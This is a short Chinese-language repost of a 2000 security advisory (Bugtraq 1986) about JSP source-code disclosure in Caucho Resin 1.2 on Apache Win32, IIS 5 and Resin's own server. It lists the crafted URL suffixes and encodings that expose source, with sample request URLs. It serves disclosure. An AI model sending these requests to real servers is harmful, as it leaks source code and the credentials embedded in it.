Resin 1.2 重要源代码暴露漏洞

作者：来源：添加时间：2006-5-21 19:27:20

bugtraq id 1986
class Input Validation Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published November 23, 2000
updated November 23, 2000
vulnerable Caucho Technology Resin 1.2
- Microsoft IIS 5.0
+ Microsoft Windows NT 2000
- Apache Group Apache 1.3.6win32

Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81

Resin Web Server:
../
Example: http://target/filename.jsp../

IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp

上一篇：在HTTP请求中添加特殊字符导致暴露JSP源代码文件
下一篇：多中WEB服务器的通用JSp源代码暴露漏洞

站内搜索